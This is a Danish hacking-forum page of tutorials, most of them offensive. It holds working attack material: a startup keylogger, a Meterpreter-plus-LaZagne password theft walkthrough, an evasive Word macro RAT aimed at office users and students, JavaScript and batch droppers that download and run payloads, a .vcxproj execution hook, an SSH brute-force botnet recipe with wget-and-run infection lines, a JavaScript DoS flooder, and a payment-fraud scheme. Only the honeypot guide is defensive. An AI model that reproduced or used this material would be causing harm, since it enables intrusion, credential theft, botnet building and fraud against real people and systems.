Shellsec - Vejledninger

My bad

Sat, 18 May 2019 23:29:10 +0200

Godt der bedre uddannede mennesker end mig herinde. Jeg tog fejl, hvilket ville have været ret tydeligt hvis jeg havde brugt bare 5 minutter på at undersøge det ordentligt.

!Free USB Keylogger!

Tue, 31 Oct 2017 10:00:03 +0100

!USB Keylogger!

Hej bois, jeg faldt lige over den her tråd på hackforums omkring en meget sjov usb keylogger og tænkte jeg ville dele den med jer.
Jeg er ikke sikker på om noget lignende ligger herinde, hvis det er tilfældet så vil jeg gerne slette tråden igen :)

KLog (kræver fysisk adgang til systemet)

Install.bat: smider Winhost.exe(Keyloggeren) i startup så den automatisk bliver eksekveret.

Uninstall.bat: fjerner Winhost.exe processen og sletter den fra startup.
Getlog.bat: smider logfilen fra computeren ind på usb stikket

Clear.bat: rydder loggen på computeren(ikke på usb stikket)

Install.bat lukker ikke cmd boksen automatisk, det skal gøres manuelt.
Alle andre bat filer lukker selv når de er færdige

Jeg har ikke lavet den eller opslaget, jeg fandt den på Hackforums fra en gut ved navn Pronouncer så fuld kreds til ham.
har dog prøvet at oversætte den til dansk så godt jeg kunne.

Link til KLog

Spoiler (Click to View)

Android tablet for 50 kr.

Fri, 07 Apr 2017 10:47:53 +0200

Modtag denne (eller lignende) Android tablet for 50 kr. inkl. fragt

1. Gå ind på Quizonaut med Tor browser (der er problemer med Google Chrome)

2. Indtast dine kreditkortoplysninger (brug for guds skyld ikke dit rigtige, men noget i stil med cryptopay, (ref) så selv hvis du glemmer at afmelde dig kan de ikke trække flere penge )

3. Du modtager en email, hvori du får din ordre bekræftet.

4. Vent et par dage og afmeld dig via support@quizonaut.com

5. Skriv et professionelt afmeldelsesbrev f.eks.:

Citer:Hi Quizoaut

I would like to cancel my subscription i have with you. I signed up the xxxxx with the email xxxx - According to EU law i would still like to receive my tablet, which you promised me when i signed up. I have paid you 50 DKK, and i would like you not to withdraw anymore funds from my credit card, unless i am to sign up to your service again.

Best regards
xxx

6. Du bliver herefter videresendt via mail til en hjemmeside, som hedder giftcable.com

7. De vil bede om bevis på at det er dig. Jeg sendte et billede af pas med alle sensitive informationer fjernet. Du kan også prøve at nægte og true dem med anmeldelse, da det jo ikke er normal procedure. Brug evt. dette EU link, da det skræmmer dem at du ved hvad du siger og har belæg for det.

Citer:Chapter 8: Protection against unfair practices38

(1) Any consumer, including the digital consumer, has the right either to complain to the national enforcement authorities39 or to take legal action against a trader in the EU that uses unfair commercial practices. For example, after making an online purchase, consumers cannot be made subject to onerous or disproportionate non-contractual obstacles (such as filling in a large amount of forms or being asked to call a specific phone number when no one is answering the call) in order to prevent them from terminating the contract or switching to another product or trader.40

8. Giftcable vil nu prøve at stalle dig til at give op. Vær nærgående og nævn så tit du kan at de ifølge lovgivningen skal sende dig tabletten.

9. Grin over deres latterlige fremgangsmåde:

10. Modtag tabletten, brick den og start forfra igen...

- Det tog længere tid end jeg regnede med at skrive. Jeg håber i kommer til at nyde jeres tablets og skriv endelig, hvis i løber ind i problemer.

[TUTORIAL] Hack alle passwords - Shell

Thu, 09 Mar 2017 14:35:38 +0100

Jeg håber I nyder nr. 2 Tutorial fra mig :)

Beskrivelse:
I den følgende Tutorial, vil du komme til at arbejde med Shell Console, Metasploit og LaZagne.
Formålet er, at skaffe alle ofrets gemte kodeord.
Du kan se en liste over, hvilke slags passwords, du kan hacke.

Hvad du skal bruge:

Kali Linux
Metasploit
Basic viden om Kali Linux
Hjerne

Hvem er dette attack målrettet i mod?:

Alle der infectet af en metasploit exploit.

Download links:

https://github.com/AlessandroZ/LaZagne/releases/

Tutorial:

Download LaZagne ved at skrive wget https://github.com/AlessandroZ/LaZagne/r...indows.zip
Unzip filen ved, at skrive unzip Windows.zip.
Skaf en metasploit session til ofret. Du kan søge online efter det, eller bruge min metode, som beskrevet her
Select dit offer. Skriv sessions for, at se hvilket session ID ofret har. Herefter skriver du sessions -i . I mit tilfælde sessions -i 1
Nu skriver du cd temp for, at komme ind i temp mappen, på ofrets computer.
Upload nu LaZagne til ofrets temp mappe. Skriv upload , i mit tilfælde upload '/root/unicorn/Windows/laZagne.exe' .
Nu skal du oprette shell adgang, til computeren. Det gør du ved at skrive shell.
Nu kan du se, at du er inde i temp mappen

Kode:
meterpreter > shell Process 12260 created. Channel 3 created. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. Alle rettigheder forbeholdes. C:\Users\XXXXXX\AppData\Local\Temp>
Skriv nu herefter følgende laZagne.exe all
Nu har du fået en liste, med alle de gemte kodeord på ofrets computer.

Er der noget jeg kan gøre bedre, vil jeg også meget gerne vide det - har du brug for hjælp til noget, eller har du nogle spørgsmål, så er du velkommen til at poste det i kommentar.

Jeg valgte at lave denne tutorial, fordi folk spurgte mig i min tråd og i PM, hvordan man gjorde :) Jeg håber I kunne bruge min nummer 2 tutorial - det er altid en fornøjelse, at lave en tutorial for jer - jeg elsker jeres feedback.

- TheHacker, ude

[TUTORIAL] Word RAT Macro - Powershell

Wed, 01 Mar 2017 21:53:51 +0100

Hehe... Så kom der en lille sjov tutorial...

Beskrivelse:
I den følgende Tutorial vil du komme til at arbejde med Word Macros (RATs).
Denne metode vil give dig fuld adgang til ofrets computer.
Den måde denne exploit fungere på er, at når en person åbner Word-filen du har sendt, så vil ofrets computer automatisk køre din fil.
Denne metode er 95% FUD. Der er nogle få, der opdager denne RAT, men de færreste.
Word dokumentet lukker med en fejl besked "The document appears to be made on an older version of Microsoft.
Please have the creator save to a newer and supported format.", når det bliver åbnet. Dette kan dog laves om, hvis du vil.

Hvad du skal bruge:

Word 2016 (kan crackes, lidt ligegyldigt) eller hvilket som helst Microsoft Dokument fil
Kali Linux (hvis det er vmware/virtuelbox, så skal den være bridged)
Metasploit basic viden
Hjerne
Viden

Hvem er dette attack målrettet i mod?:

Hovedsageligt kontor brugere, elever, skoler, lærere
Word brugere

Download links:

https://github.com/trustedsec/unicorn

Tutorial:

Tænd din kali linux
Skriv apt-get install git, dette vil installere git, som bla. kan bruges til at hente github repositories
Skriv apt-get install python, for at installere python
Herefter skal du hente unicorn, det gør du ved at skrive git clone https://github.com/trustedsec/unicorn.git
Nu skal vi ind hvor unicorn er blevet hentet. Det gør du ved at skrive cd unicorn
Nu kan du skrive python unicorn.py ved, at skrive dette kan du, se hvad du kan bruge scriptet til.
Du skal nu finde din IP på sider som whatismyip, canyouseeme og eller hvilken som helst anden. Søg blot efter "find my ip" på google.
Jeg anbefaler dog canyouseeme, da vi kommer til at bruge den senere.
Nu skal du sørge for at din port er portforwarded (håber jeg, du ved hvordan)
Skriv nu python unicorn.py windows/meterpreter/reverse_tcp macro
Du kan nok genkende windows/meterpreter/reverse_tcp fra metasploit.
Nu opretter den en fil "powershell_attack.txt" her i ligger din macro kode. Den kommer vi til at bruge senere.
Du kan se, du kan bruge msfconsole -r unicorn.rc for at den automatisk kører din payload i metasploit, dog skal vi lige ændre noget.
Skriv leafpad unicorn.rc og ændre LHOST til din inet adresse. Denne kan findes ved at skrive ifconfig i terminalen.
Grunden til, at vi gør det, er så vi kan listen scriptet på din computer. Du kan ikke bruge den optimalt, hvis du ikke ændre det,
fordi den forsøger at forbinde til din ip, i stedet for din inet adresse.
Jeg har lige opdaget, at den nye version af unicorn har en fejl, der gør, at du også skal ændre LPORT.
LPORT skal ændres til den port, du har portforwarded.
Åben nu word på din egen computer og opret et dokument,
Kopier indeholdet fra powershell_attack.txt (leafpad powershell_attack.txt)
Gå nu ind til dit word dokument igen og tryk under Makroer i: "Dokument (dokument)"--> Herefter Vis --> Makroer --> Opret --> Under Project (Dok1) vælger du "ThisDocument" --> sæt herefter hele powershell scriptet ind.
Ændre

Citer: Sub Auto_Open()
Dim gEmssmj

til AutoOpen, det vil sige uden _
Herefter ændre i det, som du vil. Du kan f.eks. fjerne

Citer:Dim title As String
title = "Microsoft Corrupt Document"
Dim msg As String
Dim intResponse As Integer
msg = "The document appears to be made on an older version of Microsoft.
Please have the creator save to a newer and supported format."
intResponse = MsgBox(msg, 16, title)
Application.Quit

fra scriptet for at undgå den lukker. Du kan også ændre teksten af fejlbeskeden, hvis du vil.
Nu kan du vælge at skrive noget i word dokumentet, hvis du vil.
Vi skal nu gemme word dokumentet (på en speciel måde), gå ind under Filer --> Gem som --> Gennemse (og vælg, hvor du vil gemme den) --> Under filtype vælger du "Word 97 - 2003-dokumenter (*.doc)"´
Tryk nu gem
Gå tilbage til din kali linux og kør msfconsole -r unicorn.rc og vent på at den er færdig, hvor der står (
Starting the payload handler...).
Prøv nu at åbne dokumentet på din computer (det er sikkert, bare rolig) og se om du kan se noget i din terminal. Hvis du har gjort alt rigtigt, skal der gerne stå (Meterpreter session 1 opened )
Nu kan du vælge Sessionen ved, at skrive sessions, nu kan du se en liste over alle dine ofre (i dette tilfælde, dig). Vælg din session, ved at skrive sessions -i 1, så vil du automatisk blive connected til den valgte session.
Skriv nu help for, at se hvad du kan (generelle metasploit ting)
Hvis du vil have den til at starte op med computeren, så vil nogle antivirus (ret mange), opdage det. Du kan dog prøve ved at skrive run persistence

Du kan også finde ofrets gemte kodeord i ting så som, steam, skype, browsers, etc. Det kan være jeg vil lave en tutorial om det.

Er der noget jeg kan gøre bedre, vil jeg også meget gerne vide det - har du brug for hjælp til noget, eller har du nogle spørgsmål, så er du velkommen til at poste det i kommentar.
Lad for gudsskyld være med at bruge virustotal... Vi vil jo gerne holde den undetected... :)

Jeg valgte at lave denne tutorial, fordi jeg tænke den kunne være sjov og effektiv - desuden er den ikke set, så meget (førhen var den meget populær), men nu kan den også bruges i Word 2016, hvor det førhen var de ældre versioner.

- TheHacker, ude

Infikcer computere via .sln

Wed, 31 Aug 2016 13:10:29 +0200

.sln are project-fil fra Visual studio og ved at tilføje en simple kan man starte en executeable fil når man starter projektet da når Visual studio starter læser den fra resourcen .vcxproj
Jeg så her i går et post med et javascript som downloader og executer og tænkte at det enligt var lettere at includere men det er op til personen som tager dette i brug.

// Du kan jo starte alt fra powershell.

Du putter oven stående kode ind i .vcxproj for sln projectet og gemmer og så når sln-filen starter køres filen.

Her er et eksempel a en redigeret .vcxproj:





    


  

    

      {---snippet---}

      cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx

    

    

      {---snippet---}

      h;hh;hpp;hxx;hm;inl;inc;xsd

    

    

      {---snippet---}

      rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms

    

  

  

    

      Source Files

    

  

  

    

      Header Files

    

    

      Source Files

    

  

  

    

      Resource Files

    

  

  

    

      Resource Files

Javascript Download+Execute

Mon, 11 Jul 2016 18:36:22 +0200

Eftersom vi allerede har en tråd omhandlende infektion med batch liggende her:
https://www.shellsec.pw/traad-simpelt-fu...le-dropper
Tænkte jeg, at jeg lige så godt kunne dele dette javascript - script...

Det sidste stykke tid er der dukket en del artikler op, der handler om inficering ved hjælp af Javascript-filer.
Her er et eksempel fra v2: https://www.version2.dk/artikel/sophos-r...ler-737254

Disse scripts køres altså ikke på nettet, men til gengæld på maskinen selv, ved hjælp af Windows Script Host.

Nedenstående script vil downloade og køre Putty.exe samt Demystifying_Google_Hacks.doc(Hvis man har et program, såsom Word, til at håndtere filtypen), når der dobbelt-klikkes på det.
Jeg tror ikke scriptet behøver videre forklaring, da det absolut giver sig selv. Der er ikke mulighed for at ændre ikon, som vi kender det fra eksekverbare filer, men jeg tror stadig den 'mindre kendte' filtype/endelse opvejer den negativ.

JSDownloader.js

Kode:
var activeX= this['ActiveXObject'];

var wShell = new activeX('WScript.Shell');

var cObject = WScript.CreateObject('MSXML2.XMLHTTP');

hentFil('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe', gemSom('putty.exe'));

hentFil('http://www.infosecwriters.com/text_resources/doc/Demystifying_Google_Hacks.doc', gemSom('doc.doc'));

function hentFil(fil, mappe){

cObject.Open('GET', fil, false);

cObject.Send();

if (cObject.Status == 200)

{

    var Stream = WScript.CreateObject('ADODB.Stream');

    var i = Stream.Open();

    var o = Stream.Type = 1; // adTypeBinary

    var u = Stream.Write(cObject.ResponseBody);

    var y = Stream.Position = 0;

    var File = WScript.CreateObject('Scripting.FileSystemObject');

    if (File.FileExists(mappe))

    {

        File.DeleteFile(mappe);

    }

    Stream.SaveToFile(mappe, 2); // adSaveCreateOverWrite

    Stream.Close();

    var objShell = new ActiveXObject("WScript.shell");

    objShell.run(mappe);

    }

}

function gemSom(filNavn){

    var tempMappe = wShell['ExpandEnvironmentStrings']('%TEMP%') + '/';

    return tempMappe + filNavn;

}

Mulige forbedringer og bemærkninger:
- Man kunne i stedet køre en loop hvis der skal hentes flere filer
- Man kunne bruge obfuscation, da dette er trivielt nemt i Javascript
- Man kan pumpe filstørrelsen, så den stemmer mere overens med et normalt dokument

6/55 på VirusTotal:
https://virustotal.com/da/file/93d421adc...468251292/

Simpelt FUD Batch script med file dropper

Tue, 02 Feb 2016 20:15:01 +0100

Bare lige et lille batchscript jeg har liggende som downloader en fil til /temp/file og derefter executer den så du for en succesfull installation af din fil
Filen skal selvfølgelig helst være Runtime FUD men selv filer med detektioner kommer ofte igennem.

Batch scripted er lidt tricky at få folk til at åbne, men den kan da bindes til en anden fil.

Destinationen på filen kan ændres i scripted med lidt basal batch script forståelse.

Kode:
@echo off

mkdir %tmp%\file\  > nul 2> nul

echo Please wait, loading...

echo $down = New-Object System.Net.WebClient > %tmp%\file\flash_log_backup.ps1

echo $url  = 'INDSÆT DIRECT DOWNLOAD LINK HER'; >> %tmp%\file\flash_log_backup.ps1

echo $file = '%tmp%\file\flash_log_backup.exe'; >> %tmp%\file\flash_log_backup.ps1

echo $down.DownloadFile($url,$file); >> %tmp%\file\flash_log_backup.ps1

echo $exec = New-Object -com shell.application >> %tmp%\file\flash_log_backup.ps1

echo $exec.shellexecute($file); >> %tmp%\file\flash_log_backup.ps1

powershell.exe -executionpolicy bypass -file %tmp%\file\flash_log_backup.ps1

echo msgbox "ERR?R!" > %tmp%\tmp.vbs

cscript /nologo %tmp%\tmp.vbs

del %tmp%\tmp.vbs

exit

Premium Vejledning | Bruteforce et stort botnet

Mon, 24 Aug 2015 23:08:42 +0200

Light Aidra og LRAB - Bruteforce dig til et stort botnet.
Vejledning af Sc0rp10n

Du skal have en dedikeret server som tillader scanning og hvilken som helst server som er unmetered.

Download Light Aidra her: http://0xplanet.com/archive/Botnets/Ligh...master.zip
Efter du har unzippet filen og omdøbt filen til noget kort.
Når LA er placeret et sted og omdøbt så cd hen til LA så skriv mkdir bin -
Derefter cd til bin og skriv derefter nano s.sh og tilføj cross compliers.

Cross compliers i raw link format: http://pastebin.com/raw.php?i=edrqt9RB

wget http://uclibc.org/downloads/binaries/0.9...ps.tar.bz2 && tar -xvjf cross-compiler-mips.tar.bz2 && rm -rf cross-compiler-mips.tar.bz2

wget http://uclibc.org/downloads/binaries/0.9...el.tar.bz2 && tar -xvjf cross-compiler-mipsel.tar.bz2 && rm -rf cross-compiler-mipsel.tar.bz2

wget http://uclibc.org/downloads/binaries/0.9...5l.tar.bz2 && tar -xvjf cross-compiler-armv5l.tar.bz2 && rm -rf cross-compiler-armv5l.tar.bz2

wget http://uclibc.org/downloads/binaries/0.9...pc.tar.bz2 && tar -xvjf cross-compiler-powerpc.tar.bz2  && rm -rf cross-compiler-powerpc.tar.bz2

wget http://uclibc.org/downloads/binaries/0.9...h4.tar.bz2 && tar -xvjf cross-compiler-sh4.tar.bz2 && rm -rf cross-compiler-sh4.tar.bz2

wget http://uclibc.org/downloads/binaries/0.9...32.tar.bz2 && tar -xvjf cross-compiler-x86_32.tar.bz2  && rm -cross-compiler-x86_32.tar.bz2

Efter du har gemt din redigering skal du chmod filen (s.sh).
For at chmod filen skriv: chmod 777 s.sh
Efter det er gjort skal du skrive sh s.sh og så lad den køre.

Nu skal du downloade en irc bot som er passende og for startere anbefaler jeg Kaiten.

Download Kaiten her: ftp.109.235.50.139/pub/kaiten.c
Når Kaiten er installeret skal du redigere kaiten.c til dine egne informationer efter et er gjort skal du upload din modificeret version af Kaiten med dine infos.
Nu skal du cd ind i /root/LA/bin når det er gjordt cd til alle dine compliers og complie dem.
Eksemepl:

cd cross-compiler-mipsel/bin

wget ftp://DitFtpLinkForModificeretKaiten

./mipsel-gcc -o mipsel kaiten.c

og sådan skal du bare gøre med resten af dine cross compliers.

Efter du har cross complied er der en ny fil som hedder det samme som compilied cross complier den køre du foreksempel sådan her:
/mipsel-gcc -o mipsel kaiten.c det laver en ny fil som hedder mipsel, filen er din complied kaiten du vil bruge i botex.
Når det er gjort skriv mkdir /root/Compiled og flyt alle dine compliede bots derhen. Eksempel: mv mipsel /root/Compiled

Nu skal du installere Httpd, ved brug af yum install, apt-get etc.
Når du har downloadet Httpd skriv service httpd start for at starte httpd.
Efter du har startet httpd så skal du cd ind i din compiled mappe og flyt alt over i /var/www/html/.
Eksempel: mv mips mipsel sh4 powerpc x86_64 armv5l /var/www/html/
Skriv cd /var/www/html/ for at cd til /var/www/html/ og skriv så nano gb.sh og redigere den med koden herunder:

#!/bin/sh



wget -c http://ditlink.dk/armv5l -P /var/run && chmod +x /var/run/armv5l && /var/run/armv5l

wget -c http://ditlink.dk/mips -P /var/run && chmod +x /var/run/mips && /var/run/mips

wget -c http://ditlink.dk/mipsel -P /var/run && chmod +x /var/run/mipsel && /var/run/mipsel

wget -c http://ditlink.dk/powerpc -P /var/run && chmod +x /var/run/powerpc && /var/run/powerpc

wget -c http://ditlink.dk/sh4 -P /var/run && chmod +x /var/run/sh4 && /var/run/sh4

wget -c http://ditlink.dk/x86_64 -P /var/run && chmod +x /var/run/x86_64 && /var/run/x86_64



sleep 3;

rm -fr /var/run/gb.sh

Gem redigeringer og chmod filen gb.sh.
Eksempel: chmod 777 gb.sh

Nu skal du installere Botex
Installere disse moduler med cpan

cpan force install IO::Socket

cpan force install IO::Select 

cpan force install Parallel::ForkManager

cpan force install Net::SSH2

Efter det skriv følgende i din terminal for at rette ssh2:

yum install gcc php-devel php-pear libssh2 libssh2-devel

pecl install -f ssh2

touch /etc/php.d/ssh2.ini

echo extension=ssh2.so > /etc/php.d/ssh2.ini

cpan force install Net::SSH2

Nu skal du download LRAB
Link: https://b.1339.cf/surknso.rar

Når du har overført LRAB til din server efter at have downloaded og unzippet den på din computer så åben LRAB og åben filen "wget.pl" og gå så over til linje 26 i wget.pl og ændre linjen.

channel->exec('cd /tmp && wget http://ditlink.dk/gb.sh && sh gb.sh && rm -rf gb.sh');

Når et er gjort skal du scanne for at lave lister, sådan her lavet du et scan.

./class PORT -a RANGE -i INTERFACE -s 10

Når du har lavet en liste så skriv ./go og så vil den spørge om "Max Process" og så sæt den mellem 600 og 1000 og så bruteforcer den listen du har lavet. Når bruteforcing er færdigt så nano wget.pl og redigere linje 11

open(fh,'<','vuln.txt'); @newarray; while (){ @array = split(':',$_);

Ændre vuln.txt til din txt-fil og gemt så filen wget.pl og i din terminal skal du så bare execute wget.pl med perl
Eksempel: perl wget.pl

Jeg har lavet en masse fil for scanning af min modificeret LRAB version.

./class 22 -a 170 -i eth0 -s 10

./class 22 -a 171 -i eth0 -s 10

./class 22 -a 172 -i eth0 -s 10

./class 22 -a 173 -i eth0 -s 10

./class 22 -a 174 -i eth0 -s 10

./class 22 -a 175 -i eth0 -s 10

./class 22 -a 176 -i eth0 -s 10

./class 22 -a 177 -i eth0 -s 10

./class 22 -a 178 -i eth0 -s 10

./class 22 -a 179 -i eth0 -s 10

./class 22 -a 130 -i eth0 -s 10

./class 22 -a 131 -i eth0 -s 10

./class 22 -a 132 -i eth0 -s 10

./class 22 -a 133 -i eth0 -s 10

./class 22 -a 134 -i eth0 -s 10

./class 22 -a 135 -i eth0 -s 10

./class 22 -a 136 -i eth0 -s 10

./class 22 -a 137 -i eth0 -s 10

./class 22 -a 138 -i eth0 -s 10

./class 22 -a 139 -i eth0 -s 10

./class 22 -a 140 -i eth0 -s 10

cat bios.txt | sort | uniq > mfu.txt

screen ./update 5000

Update er bedre modificeret bruteforcer. Hvis du er nervøs for at bruge update fordi den er obfusticated så skriv screen ./go 5000

Tillykke du nu sat op light adria og LRAB op og har lært at bruteforce routere.

Javascript botnet

Sun, 12 Jul 2015 01:03:13 +0200

Introduktion:
Hej. Da jeg bedre kan formulere og forklare mig på engelsk - har jeg valgt at skrive hele tråden om på engelsk. Det må i leve med.

Welcome to my thread, I will introduce you all into making a simple but stable javascript botnet that can perform a dos attack. The dos attack can be very strong if you have a good amount of traffic being sent to the javascript botnet when it is up and running.

Now to the setup part...

This is very easy to setup. All you have to do is to copy and paste the first code into your editor/complier and save it in the proper extension (JS).
When instructions are followed you can upload your script to your hacked webhost or your own webhost, then you can use your traffic as your power source.
Imagine you the power of this, if you hack a host with domains with lots of traffic and put up your arbitrary file (JS-file) on the webhost and then you will have a very powerful attack source and since the code is small and easy configured.
You will always be able to receive heck lots of traffic and change the target on your "small" but powerful botnet used to perform DOS attacks. All you need is traffic, no more scanning / exploiting / bruting...

function jsflood() {

   var HOST = 'target.com'

   var URI = '/'

   var img = new Image()

   var rand = Math.floor(Math.random() * 1000)

   img.src = 'http://'+TARGET+URI+'?keywords='+rand+"=Javascript botnet"

}



setInterval(jsflood, 0)

The script below is a script I've wrote quickly. It was written in VB.
If you don't have any experience in hacking and can't obtain any traffic or find any reliable traffic sources or just want to get more traffic, then this is good for you.
When you have your domain and host up and running then you can use your windows bots as traffic. Basically you put this into your console application and build it and run it on your bots and ABRACADABRA !

Complie and run...

Process proc = new Process();

proc.StartInfo.UseShellExecute = false;

proc.StartInfo.CreateNoWindow = true;

proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;

process.start("trafikmodtageneside.dk")

proc.StartInfo.RedirectStandardError = false;

proc.StartInfo.RedirectStandardOutput = false;

proc.StartInfo.UseShellExecute = false;

proc.StartInfo.CreateNoWindow = true;

proc.Start();

proc.WaitForExit();

Kom i gang med HoneyDrive Honeypot

Fri, 17 Apr 2015 04:19:15 +0200

Indledning:
Der er blevet ønsket nogle informationer om honeypots, så her er en lille guide til at hjælpe dem i gang, der gerne vil have et indblik i, hvordan det virker.
Jeg har med vilje valgt en færdigbygget distro, for at slippe for at skulle beskrive installation og opsætning af denne.

Produktet vi vil se lidt på, er HoneyDrive version 3 fra Bruteforce.gr. Bemærk at den første version hed 0.1 og den næste version hed 0.2, men da både brugerne og ophavsmanden synes det var lidt underligt, sprang man der efter direkte til version 3. Det er en VM og er bygget til Oracle VirtualBox.

Om Honeydrive:
HoneyDrive er en samlig af honeypots, så man skal vælge hvad man vil køre. Der er et overlap i de porte de forskellige honeypots lytter på, alt efter hvilke services de virker med. Og der er forskellige typer honeypots. Her til, er der nogle scripts og nogle web interfaces til at se statistikker osv med. HoneyDrive er baseret på Ubuntu. Brugeren og koden til Honeydrive er honeydrive:honeydrive, dog bliver man automatisk logget på, når den booter. Denne bruger er en sudo bruger.

Kippo:
Kippo er en medium-interaction SSH honeypot. Dette betyder, at en bruger/hacker der f.eks. har held med at brugeforce koden, faktisk kan indtaste kommandoer og få nogen lunde realistisk output tilbage. Outputtet er statisk, så det er ret nemt at se, det er en honeypot, hvis man bare er opmærksom på det. Man kan godt ændre disse statiske ting, og ændre i filsystemet, som f.eks. lave nye mapper, og definere nye kommandoer, ændre i nuværende osv., men det er ikke just en dans på roser.
Når man bruger Kippo, vil hele brugerens session blive gemt, og man kan så afspille denne log, for at se alt hvad brugeren gør. Man kan få et indblik i, hvordan hackerne arbejder. De filedownloads brugeren udfører, vil blive gemt, så du kan se på dem efterfølgende.
Selv om brugeren forsøger at eksekvere de filer, der bliver downloaded, sker der ikke noget, så man skal ikke være bange for at blive inficeret med noget.

Kippo startes med følgende kommando:

Citer:$ sh /honeydrive/kippo/start.sh

Og stoppes med:

Citer:$ sh /honeydrive/kippo/stop.sh

Så vidt jeg husker, vil Kippo ikke køre som root.
Når først Kippo er kørende, er det bare at vente på, nogen bider på krogen.
Det sjove er selvfølgelig at se de data der bliver samlet.
Man skal selvfølgelig huske at hive HoneyDrive af nettet, da det kræver man startet Apache2 og det gøres med:

Citer:$ service apache2 start

Start en browser og besøg "http://127.0.0.1/kippo-graph/".

Jeg har sat nogle screenshots ind, men det giver selvfølgelig et bedre billede, hvis man selv kan kigge. Jeg viser heller ikke det hele, så se det som en appetitvækker.

ki_gra_7.PNG (Størrelse: 102,93 KB / Downloads: 42)

ki_gra_3.PNG (Størrelse: 37,76 KB / Downloads: 25)

Kippo gemmer downloaded filer i "/honeydrive/kippo/dl/" og de aktivitetslogs der bliver dannet, når en logger ind på Kippo "ssh server", ligger i "/honeydrive/kippo/log/tty/".

Dionaea:
En anden form for honeypot er Dionaea og denne virker helt anderledes. Det er ikke meningen, den skal have nogen interaktion med brugeren.
Den er bygget til at samle malware med. Oftest noget der kommer fra bots, der "surfer" nettet efter ofre, den kan angribe automatisk.
Derfor lytter den efter bestemte services, og når der kommer en request, svarer den så godt den kan, med det for øje, at få maskinen "inficeret". Maskinen bliver selvfølgelig ikke inficeret, men Dionaea downloader malwaren, så den kan researches. Det er selvfølgelig mest interessant, hvis man gerne vil reverse malwaren og undersøge malware trends. Og selvfølgelig evt. samle 0-days op til analyse.

Dionaea startes med:

Citer:$ sh /honeydrive/dionaea-vagrant/runDionaea.sh

For a se statistikker fra Dionaea, bruger jeg DionaeaFR og dette startes med:

Citer:/honeydrive/DionaeaFR$ python manage.py runserver

Start så en browser og besøg "https://127.0.0.1:8000/".

Jeg kan ikke huske om DionaeaFR kun lytter på localhost, men det er selvfølgelig en god idé at sørge for, den ikke kan nås fra Internettet, når man kigger på disse data.

  dio_binary.PNG (Størrelse: 83,42 KB / Downloads: 24)

  dio_fr_5.PNG (Størrelse: 39,47 KB / Downloads: 16)

Dionaea gemmer malware, den har hentet/modtaget i "/opt/dionaea/var/dionaea/binaries/", så det kan være en god idé at holde lidt øje her.

Netstat med Kippo og Dionaea kørende:

  honey_netstat.PNG (Størrelse: 135,48 KB / Downloads: 22)

Som man kan se, kan der være ret meget traffik.
Jeg har faktisk også været ude for, at et helt klasse C netværk kørte SSH bruteforce eller dictionary attack mod min honeypot. Det må man sige at være organiseret kriminalitet.

OBS:
For at få noget traffik på en honeypot, skal den selvfølgelig kunne tilgås fra Internettet. Enten direkte på nettet, eller via NAT eller lign.
Vær opmærksom på at Apache automatisk starter på HoneyDrive, så vis man booter HoneyDrive, og maskinen er direkte på nettet, vil alle i verden kunne se Kippos statistikker. Og det må siges at være et lidt for tydeligt hint for en hacker, om at det er en honeypot. Et andet problem med dette er, at hvis man bruger en anden honeypot som lytter på port 80, vil porten allerede være i brug af Apache. Det anbefales at slå dette fra.
En lille fodnote: Hvis du sætter den direkte på Nettet og host operativsystemet er windows, skal du sikre dig, din windows maskine ikke får en offentlig IP, og ikke kan tilgås fra Internettet. Desværre kan man ikke bare deaktivere hostens netkort, så vil guest operativsystemet (HoneyDrive) heller ikke være tilgængelig. Et trick kan være at lade netkortet på hosten (windows) være aktivt, men slå IPv4 og IPv6 fra.
Disse udfordringer har man ikke med Linux som host operativsystem.
Når HoneyDrive er bootet, så vil jeg anbefale at lave en "netstat -antp" og en "netstat -anup", så man kan kontrollere, der ikke kører services der ikke skal kunne tilgås fra Internettet. Nogle services vil altid køre og det er ok, så længe de kun lytter på localhost/127.0.0.1.

Mere:
Ud over det vi har været i gennem, indeholder HoneyDrive følgende:
Honeyd, Amun, Glastopf, Conpot, Wordpot. Thug, PhoneyC, LaBrea, Tiny Honepot, IIS Emulator, INet Sim, Maltrive, en masse interfaces til at se statistik med, og en del andre tools.
Jeg har dog kun erfaring med Kippo Og Dionaea og kører altid disse to samtidig.
Den readme file der er under download linket, sammen med HoneyDrive, er et must-read.
Lige når man har bootet HoneyDrive, vil der være en hel del opdateringer. Om man vil opdatere det hele eller ej, er valgfrit, man skal dog være opmærksom på, at opdateringer muligvis gør, at noget ikke fungerer.
Er man interesseret i det, findes der en masse på nettet om disse ting. Det er et stort område, og denne guide er meget kort. Det er min intention at få folk i gang, og at i får lidt blod på tanden. Og så selv finde nogle flere informationer om de enkelte elementer.

Det kan anbefales at lave nogle små scripts, der viser interessante mapper, starter eller stopper den eller de honeypots, man ønsker at køre. Det har jeg gjort.

Links:
Bruteforce.gr/honeydrive
Sourceforge Download
VirtualBox Download
Kippo
Dionaea

RAT Guide

Thu, 09 Apr 2015 14:04:02 +0200

Hvis du er nyt til diverse RAT programmer, så er det et godt sted at starte her.
Jeg har skrevet en guide som er til at forstå for alle forhåbenligt.
Kom gerne med ris og ros hvad der kan gøres bedre eller skal rettes.
Jeg vil opdater guiden med fejl eller mangler hvis det er nødvendigt.

LÆS GUIDEN FØR DU SPØRG OM HJÆLP TAK!
Det er meget begrænset hvad jeg hjælper med i guiden.
Premium versionen er på vej hvor der er fuld support + mere. Det hele står i guiden.
Premium kommer til at koste Koster 25kr.

Guiden kan hentes her

Password er: shellsec.pw

Virustotal link fra DarkNigga: https://www.virustotal.com/da/file/c9d61...428590782/
DarkComet er ikke mit eget link, der er fra en meget trusted gut fra HF.

BadUSB Gennemgang

Wed, 22 Oct 2014 23:10:10 +0200

Synes lige vi skulle tage et kig på BadUSB, så længe det stadig er rimelig nyt for de fleste, og ikke en angrebsmåde man kender til i den brede offentlighed Uden for IT-verdenen. De fleste ville selvfølgelig være lidt suspekte over en fremmed, ja selv en velkendt person, som stikker et USB stik i ens Computer. Det gode er her, at angrebet kan klares ’håndfrit’, og alt der kræves er et minut – man behøver ikke engang kigge på skærmen.
Vi vil kun kigge på ét af de 3 firmware modificeringer som Psychson er stand til at køre på nuværende tidspunkt.

Lad os starte ud med en kort video (1 minut) af mit resultat af denne test:

